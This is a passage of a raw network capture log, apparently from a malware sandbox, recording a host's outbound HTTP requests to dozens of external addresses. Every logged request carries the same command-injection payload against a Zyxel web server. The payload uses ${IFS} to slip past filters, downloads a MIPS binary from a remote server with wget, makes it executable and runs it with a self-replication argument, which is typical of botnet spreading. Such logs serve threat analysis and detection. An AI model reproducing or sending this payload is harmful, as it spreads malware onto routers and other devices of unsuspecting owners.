                                            Feb 2, 2024 06:21:21.826580048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6668192.168.2.1539430108.164.203.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826627970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6669192.168.2.1547008129.43.175.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826657057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6670192.168.2.1540606163.6.99.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826668024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6671192.168.2.153693450.157.177.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826699972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6672192.168.2.1559276155.25.251.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826766968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6673192.168.2.154061266.48.140.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826780081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6674192.168.2.1537138222.2.154.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826803923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6675192.168.2.154125494.84.81.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826817989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6676192.168.2.1555308103.201.252.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826873064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6677192.168.2.153894075.1.118.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826899052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6678192.168.2.1533040100.208.173.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826944113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6679192.168.2.1533378130.55.202.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.826986074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6680192.168.2.1557138179.153.175.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827013969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6681192.168.2.1559252193.175.191.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827028990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6682192.168.2.1538600146.26.139.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827059984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6683192.168.2.1550016187.134.93.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827085972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6684192.168.2.1537570167.213.3.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827147961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6685192.168.2.1547374107.212.6.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827172041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6686192.168.2.154580680.167.161.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827236891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6687192.168.2.1556984193.71.152.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827276945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6688192.168.2.153872689.111.221.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827308893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6689192.168.2.1556128203.130.213.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827356100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6690192.168.2.1535046177.34.199.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827393055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6691192.168.2.1551002212.51.28.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827425003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6692192.168.2.15387782.21.153.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827478886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6693192.168.2.15412201.50.150.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827502966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6694192.168.2.1558340186.244.73.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827538967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6695192.168.2.1536050109.239.150.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827732086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6696192.168.2.155075488.75.25.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827764034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6697192.168.2.155003089.178.194.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827790022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6698192.168.2.1537522158.249.122.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827843904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6699192.168.2.1548136118.100.153.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827888012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6700192.168.2.155092042.194.231.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827915907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6701192.168.2.1556116209.59.138.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827925920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6702192.168.2.1543280128.148.25.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.827970028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6703192.168.2.1548366142.198.204.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828008890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6704192.168.2.154192099.163.165.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828051090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6705192.168.2.1552006202.19.169.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828072071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6706192.168.2.1557490182.120.227.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828099966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6707192.168.2.1556382108.90.67.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828146935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6708192.168.2.1550062221.182.221.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828202963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6709192.168.2.154121867.190.166.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828221083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6710192.168.2.154245039.62.183.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828257084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6711192.168.2.1540586201.108.202.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828299999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6712192.168.2.1543650122.196.102.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828349113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6713192.168.2.154682462.96.228.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828383923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6714192.168.2.1555304167.194.205.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828409910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6715192.168.2.1540970201.182.144.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828448057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6716192.168.2.153425484.107.162.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828481913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6717192.168.2.1551172170.250.133.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828528881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6718192.168.2.1548184124.44.121.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828558922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6719192.168.2.1555002180.43.85.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828589916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6720192.168.2.155942848.165.248.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828638077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6721192.168.2.1535698155.169.111.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828670979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6722192.168.2.1560562205.234.39.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828701973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6723192.168.2.154691674.176.235.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828722954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6724192.168.2.1549848218.150.15.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828762054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6725192.168.2.155639220.150.122.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828790903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6726192.168.2.155156495.114.65.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828843117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6727192.168.2.1535656184.59.185.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828882933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6728192.168.2.1549790145.212.207.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828927994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6729192.168.2.1553684147.120.122.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.828954935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6730192.168.2.1552022123.174.73.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829004049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6731192.168.2.1536918117.49.12.49443
                                            TimestampBytes transferredDirectionData
